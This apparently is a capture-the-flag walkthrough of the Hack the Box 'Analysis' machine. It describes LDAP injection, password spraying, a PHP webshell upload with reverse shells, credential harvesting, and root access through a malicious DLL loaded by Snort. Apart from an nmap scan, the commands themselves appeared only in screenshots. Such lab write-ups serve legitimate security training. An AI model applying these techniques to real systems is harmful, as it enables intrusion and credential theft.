In this post, I would like to share a walkthrough of the Analysis Machine from Hack the Box

This room will be considered a Hard machine on Hack the Box

What will you gain from the Analysis machine?

For the user flag, you must exploit a PHP website that utilizes LDAP to query user information from an Active Directory. Initially, I will employ LDAP injection techniques to enumerate user accounts. Subsequently, I will leverage this injection to access a shared account’s description field containing a password. This password will grant access to the admin panel. Within the admin panel, I will exploit an upload feature in two ways: uploading a webshell and executing an HTA file. Further, I will discover credentials for the next user in the autologon registry values and web server logs.

As for the root flag, you need to exploit the Snort dynamic preprocessor feature by crafting a malicious DLL and placing it in a location where Snort will load it.

Information Gathering on Analysis Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start

└──╼ $nmap -sC -sV -oA initial 
Starting Nmap 7.93 ( ) at 2024-06-01 07:23 EDT
Nmap scan report for
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-01 11:23:49Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-01T11:24:07
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 88.49 seconds
└──╼ $

Let’s access the website interface

There is nothing that I can abuse on the website interface.

Sadly, there is nothing that we can be looking into in the directory

Therefore, let’s enumerate the subdomain on the machine

On the subdomain on the internal, it shows us some error of “403: Forbidden, Access is denied”

We have successfully sighted the PHP file

There is an error saying “missing parameter”

After analyzing the parameter, I managed to find the potential username as a technician

Another potential username that we can use for further progress

We have successfully seen the response as shown above

We have found the login page when accessing the login.php on the employees

Spraying the username and password for the Analysis machine

The screenshot above shows the list of usernames that we can use for our next step

It will take a few minutes depending on the connection of the machine

At last, we managed to obtain the valid login credentials

We are presented with the dashboard as shown above

We can use a simple PHP reverse shell command shown in the screenshot above.

As a result, let’s upload the file on the website function as upload.php

It looks like a successful based on the error

Let’s test our command injection which looks like a success

We should be able to retrieve the reverse shell connection based on inputting the reverse shell command

However, the language of the machine seems something different from the English

After a while, I managed to find the PHP file that we managed to find earlier.

The source code of the list.php looks as shown in the screenshot above.

We also need to look into the employees’ directory

We managed to find a credential which it looks like a MySQL Database

As a result, let’s obtain another shell by using the command above.

Finally, we obtained a new reverse shell connection back to us.

Let’s upload PrivecsCheck.ps1 which can be found here

Therefore, let’s execute the command above

After a while, we managed to get jdoe’s credentials

It looks like the credentials can be used on evil-winrm

We can read the user flag by typing the “type user.txt” command

Escalate to Root Privileges Access

I noticed a suspicious snort directory and hardly any snort has been installed on the victim’s machine.

Two directories have been stored within the snort directory

At least, we can upload any malicious file into the directory

Let’s start our listener on the attacker’s machine

As a result, let’s create a malicious file that saved as dll file format

Therefore, we should be able to upload the file into the victim’s machine

It will take a while for the reverse shell connection to be executed on our attacker’s machine

Boom! At last, we managed to retrieve the root shell

We can read the root flag by typing the “type root.txt” command

Another way to access the root shell on the machine